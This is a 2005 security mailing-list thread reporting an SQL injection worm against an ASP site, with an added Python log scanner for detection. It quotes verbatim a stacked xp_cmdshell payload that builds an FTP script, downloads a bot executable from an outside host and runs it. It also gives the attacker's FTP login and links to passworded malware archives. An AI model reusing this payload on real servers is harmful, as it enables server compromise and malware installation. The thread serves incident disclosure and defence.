[Full-Disclosure] Re: [Dshield] SQL injection worm ?

From: Maxime Ducharme (mducharme_at_cybergeneration.com)
Date: 01/19/05

    To: <full-disclosure@lists.netsys.com>, "General DShield Discussion List" <list@lists.dshield.org>, <incidents@securityfocus.com>
    Date: Wed, 19 Jan 2005 14:12:39 -0500
    
    

    Hi to the List

    today we received the same SQL injection attack
    on the same URL :

    IP : 24.1.139.29
    (c-24-1-139-29.client.comcast.net)
    User Agent : none sent
    HTTP Verb : GET /theasppage.asp?anID=
    Attack :
    377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
    exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >>
    %systemroot%\system32\macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo binary >>
    %systemroot%\system32\macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo get lol.exe
    %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo quit >>
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell
    'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell
    '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

    The lol.exe file can be found in this archive for inspection :
    http://www.cybergeneration.com/security/2005.01.19/lol.zip
    zip pass is das978tewa234

    Norton with definitions of 12 Jan. doesn't find anything
    suspicious.

    I'm interested if someone does an analysis on this file.

    Have a nice day

    Maxime Ducharme
    Programmeur / Spécialiste en sécurité réseau

    ----- Original Message -----
    From: "Maxime Ducharme" <mducharme@cybergeneration.com>
    To: <full-disclosure@lists.netsys.com>; "General DShield Discussion List"
    <list@lists.dshield.org>; <incidents@securityfocus.com>
    Sent: Wednesday, January 05, 2005 12:22 PM
    Subject: [Dshield] SQL injection worm ?

    >
    > Hi list,
    > we received a particular SQL injection attack
    > on one of our sites.
    >
    > Attack looks like :
    > 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET
    > /Nouvelles.asp
    > id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
    > %65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
    > 8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
    > en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
    > 5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
    > 68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
    > 5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
    > %78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
    > 5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
    > system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
    > 8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
    > Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
    > 78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
    > t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
    > %52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
    > 5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
    > 3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
    > cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
    > e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1
    > attacked.web.site.com - - -
    >
    > HTTP request contains only 2 fields (beside HTTP method) :
    > Connection: Keep-Alive
    > Host: attacked.web.site.com
    >
    > (I obviously replaced the name of the site).
    >
    > Decoded SQL injection looks like :
    > exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
    > exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >>
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >>
    > %systemroot%\system32\macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'echo get rBot.exe
    > %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'echo quit >>
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell
    > 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'del
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe
    >
    > y.y.y.y is a foreign IP in Europe which hosts FTP and WWW servers.
    > I sent a notice to this site's sysadmin about the situation.
    >
    > I have been able to connect to this FTP with the account hahajk/hahaowned
    > (which does not seem legit to me ...) and download suspicious files.
    > I mirrored them here :
    > http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
    > zip pass is 968goyw439807r3qw
    >
    > 24.164.202.24 is on rr.com networks, they have also been advised.
    >
    > I know rbot.exe is known to be the Randex worm, but I'd like to have
    > some other results / analysis.
    >
    > I also found a "test.asp" file which contains the Spybot worm.
    >
    > Weird thing is, I searched for this host's activity on every server
    > and every firewall we run, and I only see 1 TCP connection which
    > is the prepared SQL injection attack, nothing else.
    >
    > Anybody see similar activity ?
    >
    > I'm asking since I want to know if we are targeted by someone or
    > by a worm like Santy that uses search engines to find vulnerable
    > ASP scripts.
    >
    > Thanks in advance
    >
    > Happy new year to everyone !
    >
    > Maxime Ducharme
    > Programmeur / Spécialiste en sécurité réseau
    >
    >
    >
    > _______________________________________________
    > send all posts to list@lists.dshield.org
    > To change your subscription options (or unsubscribe), see:
    > http://www.dshield.org/mailman/listinfo/list
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
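An added example, not part of the post or of any list member's code: a Python checker that takes IIS W3C log lines in the layout quoted above, percent-decodes the cs-uri-query field (as the poster did by hand), and flags the stacked `exec MASTER..xp_cmdshell` pattern together with the 80040e14 SQL Server syntax error that IIS appended to the query field. The log lines below are constructed with placeholder addresses and host names.

```python
"""Flag percent-encoded, stacked xp_cmdshell injections in IIS W3C log lines."""
import re
from urllib.parse import unquote

# Constructed sample lines (placeholder addresses, not real indicators); the
# first mimics the post's record, including the |line|errcode|message tail.
SAMPLE_LOG = """\
2005-01-05 14:39:20 192.0.2.10 - W3SVC1 SRV 198.51.100.5 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20c:%5Ct.txt';--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 www.example.org - - -
2005-01-05 14:40:01 192.0.2.11 - W3SVC1 SRV 198.51.100.5 80 GET /Nouvelles.asp id_nouvelle=377 200 0 0 8123 300 HTTP/1.1 www.example.org - - -
2005-01-05 14:41:07 192.0.2.12 - W3SVC1 SRV 198.51.100.5 80 GET /Nouvelles.asp id_nouvelle=377%27;exec%20master..xp_cmdshell%20%27dir%27-- 500 0 0 1395 570 HTTP/1.1 www.example.org - - -
"""

# Indicators checked on the decoded query: statement stacking into exec,
# the command-shell procedure itself, and a trailing comment terminator.
INDICATORS = {
    "stacked_exec": re.compile(r";\s*exec\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
}
# IIS appends |<asp line>|<error code>|<message> to cs-uri-query on ASP errors.
ASP_ERROR = re.compile(r"\|(\d+)\|([0-9a-fA-F]{8})\|(.*)$")


def split_query(field):
    """Separate the real query string from the appended ASP error, if any."""
    m = ASP_ERROR.search(field)
    return (field, None) if not m else (field[:m.start()], m.group(2).lower())


def decode_query(qs, rounds=3):
    """Percent-decode repeatedly so a double-encoded payload is not missed."""
    for _ in range(rounds):
        nxt = unquote(qs)
        if nxt == qs:
            break
        qs = nxt
    return qs


def analyze(line):
    """Parse one W3C line; return a dict with decoded query and indicator hits."""
    p = line.split()
    if len(p) < 12 or p[8] not in ("GET", "POST", "HEAD"):
        return None
    query, err = split_query(p[10])
    decoded = decode_query(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if err == "80040e14":  # SQL Server "Incorrect syntax" surfaced via ODBC
        hits.append("sql_syntax_error")
    return {"client": p[2], "stem": p[9], "status": p[11],
            "decoded": decoded, "indicators": hits}


def scan(log_text):
    """Return analyses for every line carrying at least one indicator."""
    results = (analyze(l) for l in log_text.splitlines())
    return [r for r in results if r and r["indicators"]]
```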

